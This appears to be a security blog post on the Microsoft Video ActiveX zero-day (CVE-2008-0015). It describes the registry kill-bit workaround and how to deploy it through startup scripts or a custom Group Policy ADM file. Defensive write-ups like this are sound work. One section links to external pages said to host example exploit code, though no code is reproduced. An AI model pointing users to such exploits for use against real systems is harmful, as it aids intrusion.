As security vendors such as Symantec, ISS, and others are aware of the problem, antivirus and IDS signatures are either available or forthcoming.

Work Around Details

Microsoft provides an automated Fix it which entails disabling attempts to instantiate a COM object in Internet Explorer by setting the kill bit for the control in the registry. This involves adding a DWORD value to 45 keys in the registry representing Class Identifiers that relate to Microsoft Video ActiveX Control. More information can be found in the [security advisory] (href=”http://www.microsoft.com/technet/security/advisory/972890.mspx).

To implement the workaround on a single computer, you can manually enter the DWORD value 1024 (0×00000400) for each of the 45 class IDs or launch this reg file with the values.

For an enterprise environment, you have two options to deploy this workaround to your workstations. First, through the use of a computer startup script, you can add the execution of a reg file with the values for computers to launch at startup. The second option is to add a custom ADM file to a group policy object which is applied to your workstations. Which option to choose depends on preference and your environment.

Computer Start-up Script

You may already have a group policy which has a computer startup script enabled. Add a line which executes this reg file. Computer startup script is suggested as the user side startup script runs in the user’s context, and they may not have permission to modify the keys necessary. You can find more information on configuring computer startup scripts here.

 Custom ADM File in Group Policy

The challenge with an ADM file for this particular workaround is that each class ID which needs to be modified is designated as a separate key in the registry rather than a value. So, instead of being able to create a single configuration entry in a group policy object which would modify every value, you have to have an option for each key. Fortunately, the leg work has been done in this example custom ADM file, which you can cut and paste into a larger file you may already have.

Save the file where your GPO editor can browse to it. In Computer Configuration, Administrative Templates, right click and select Add/Remove templates. Once you add the template, you’ll have to ensure your filtering is setup to see “unmanaged” group policies, which are basically custom ADM entries which tattoo the registry. Under filtering, in your GPO editor, uncheck the option as shown:

gpedit

Once the ADM is added, and the filter option is cleared, you will see the configuration entries for the Microsoft Video ActiveX kill bit. Set them all to Enabled as shown:

gpedit

Once you link the policy to all your Windows XP and Windows Server 2003 computers, you will have implemented the workaround. 

Active X

ActiveX, while largely associated with Internet browsing, is not a program that runs inside the browser but rather a technology used throughout the Windows operating system. While only Windows XP and certain configurations of Windows Server 2003 are affected a similar control does exist in Windows Vista and Server 2008 that is not vulnerable.

Example Exploits

Both links provide example exploit code:

• http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/
• http://www.csis.dk/en/news/news.asp?tekstID=799

References

• Microsoft Security Advisory (972890)
• Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
• Microsoft Security Research & Defense
• Another Unpatched Vulnerability is Being Massively Exploited via Internet Explorer

Vulnerability Cross Reference

• CVE-2008-0015
• Bugtraq ID: 35558
• US-CERT Cyber Security Alert: TA09-187A

Related Posts:

• Turning an ATM into a Slot Machine
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

Related Posts:

• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010

Related Posts:

• Persistent XSS on Twitter.com
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.